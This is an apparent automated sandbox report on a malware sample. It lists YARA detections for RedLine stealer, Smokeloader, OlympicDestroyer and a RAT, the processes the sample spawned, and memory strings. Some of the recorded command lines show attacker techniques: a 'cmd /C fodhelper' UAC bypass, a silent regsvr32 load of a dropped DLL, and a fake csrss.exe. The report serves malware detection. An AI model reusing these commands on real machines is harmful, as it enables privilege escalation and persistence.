Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll

Source: 16GAuqLUFK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.16E6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.3.16E6.exe.2540000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.3.16E6.exe.2540000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 14.0.28CC.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 38.2.nsn5FE8.tmp.exe.7b0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 7.2.16E6.exe.23d0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.2.16E6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 7.2.16E6.exe.23d0e67.1.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 21.0.3ABE.exe.c50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 0000001D.00000002.2507900128.00000000007DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000021.00000002.2576715826.00000000005ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000026.00000002.3186242859.000000000080C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.2576846964.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2506318498.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.2594659373.0000000002B4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000016.00000002.2603121419.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: C:\Users\user\AppData\Local\Temp\28CC.exe, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: 16E6.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1C75.dll.2.dr	Static PE information: Section: .rdata ZLIB complexity 0.9969925094436813
Source: 1C75.dll.2.dr	Static PE information: Section: yvQ ZLIB complexity 0.9983967769483806
Source: 1C75.dll.2.dr	Static PE information: Section: c83H3w4t ZLIB complexity 0.9984004579741379

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@94/139@33/26

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_0050E1C6 CreateToolhelp32Snapshot,Module32First,

0_2_0050E1C6

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Code function: 7_2_004C5FB0 CoInitialize,CoCreateInstance,CoUninitialize,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,

7_2_004C5FB0

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_00427850 GetModuleFileNameA,LoadResource,

0_2_00427850

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\eieeggj

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5340
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5836
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6640:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6096:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5760:64:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\820.tmp

Jump to behavior

Source: Yara match	File source: 30.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000000.2501968948.0000000000401000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: 16GAuqLUFK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 16E6.exe, 00000007.00000003.2612382660.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 16GAuqLUFK.exe	ReversingLabs: Detection: 70%
Source: 16GAuqLUFK.exe	Virustotal: Detection: 77%

Source: unknown	Process created: C:\Users\user\Desktop\16GAuqLUFK.exe C:\Users\user\Desktop\16GAuqLUFK.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eieeggj C:\Users\user\AppData\Roaming\eieeggj
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\820.exe C:\Users\user\AppData\Local\Temp\820.exe
Source: C:\Users\user\AppData\Local\Temp\820.exe	Process created: C:\Users\user\AppData\Local\Temp\820.exe C:\Users\user\AppData\Local\Temp\820.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\16E6.exe C:\Users\user\AppData\Local\Temp\16E6.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1C75.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1C75.dll
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 716
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\23F8.exe C:\Users\user\AppData\Local\Temp\23F8.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\28CC.exe C:\Users\user\AppData\Local\Temp\28CC.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5340 -ip 5340
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 724
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5340 -ip 5340
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 780
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5340 -ip 5340
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 864
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3ABE.exe C:\Users\user\AppData\Local\Temp\3ABE.exe
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5AAB.exe C:\Users\user\AppData\Local\Temp\5AAB.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5836 -ip 5836
Source: C:\Users\user\AppData\Local\Temp\5AAB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 360
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6ED0.exe C:\Users\user\AppData\Local\Temp\6ED0.exe
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process created: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\820.exe C:\Users\user\AppData\Local\Temp\820.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\16E6.exe C:\Users\user\AppData\Local\Temp\16E6.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1C75.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\23F8.exe C:\Users\user\AppData\Local\Temp\23F8.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\28CC.exe C:\Users\user\AppData\Local\Temp\28CC.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3ABE.exe C:\Users\user\AppData\Local\Temp\3ABE.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
